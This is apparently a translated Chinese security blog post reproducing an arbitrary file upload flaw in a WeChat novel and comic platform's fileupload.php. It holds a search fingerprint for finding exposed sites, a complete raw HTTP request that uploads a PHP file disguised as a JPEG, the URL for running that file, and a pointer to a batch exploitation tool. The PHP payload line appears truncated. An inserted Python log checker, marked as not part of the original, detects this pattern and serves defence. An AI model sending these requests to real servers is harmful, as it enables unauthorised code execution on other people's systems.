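The WeChat Official Account novel and comic system integrates the management, publishing and reading of novels and comics, and lets users access content directly. It ships with a large built-in library covering many genres to meet varied reading needs and improve user retention; it supports author onboarding and work uploads, and is accessible from multiple clients: WeChat mini program, H5 web page, official account and native app.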
body="/Public/home/mhjs/jquery.js"
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/2
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqvlfcogulumndzor
Content-Length: 218
------WebKitFormBoundaryqvlfcogulumndzor
Content-Disposition: form-data; name="file"; filename="ert.php"
Content-Type: image/jpeg
__FILE__); phpinfo();unlink(
------WebKitFormBoundaryqvlfcogulumndzor
Access the uploaded ert.php file:
https://IP/Public/webuploader/0.1.5/server/upload/ert.php
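A log check for the upload-then-fetch pattern shown above, added here as an example and not part of the original post: it flags requests for script files under the upload directory and records whether the same client POSTed to fileupload.php first. The Combined Log Format, the extension list and the sample log lines are assumptions.

```python
import re

# Paths taken from the request and URL shown on this page.
UPLOAD_ENDPOINT = "/Public/webuploader/0.1.5/server/fileupload.php"
UPLOAD_DIR = "/Public/webuploader/0.1.5/server/upload/"
# Extensions a PHP-enabled server may execute (assumed list; match your handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Combined Log Format (assumed): ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def find_upload_abuse(lines):
    """Return one finding per request for a script file in the upload directory.

    Lines are expected in chronological order, as in a normal access log.
    """
    uploaders = set()  # clients that have POSTed to the upload endpoint so far
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore the query string
        if method == "POST" and path == UPLOAD_ENDPOINT:
            uploaders.add(ip)
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            findings.append({
                "client": ip,
                "path": path,
                "status": int(status),
                "served": status == "200",  # the server answered for that path
                "same_client_uploaded": ip in uploaders,
            })
    return findings

# Constructed sample log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/2.0" 200 57 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /Public/webuploader/0.1.5/server/upload/ert.php HTTP/2.0" 200 81234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:05:00 +0000] "GET /Public/webuploader/0.1.5/server/upload/cover.jpg HTTP/2.0" 200 20480 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:06:00 +0000] "GET /Public/webuploader/0.1.5/server/upload/x.PHP?a=1 HTTP/2.0" 404 153 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Any finding with `served` set to true means a script file exists in a directory that should only ever hold uploaded media, whichever client requested it.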
Batch detection (the batch-detection PoC tool is available through the official account's Knowledge Planet group):
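Originally published on the WeChat official account 白帽攻防: [Vulnerability Reproduction] WeChat Official Account Novel and Comic System fileupload.php Arbitrary File Upload Vulnerability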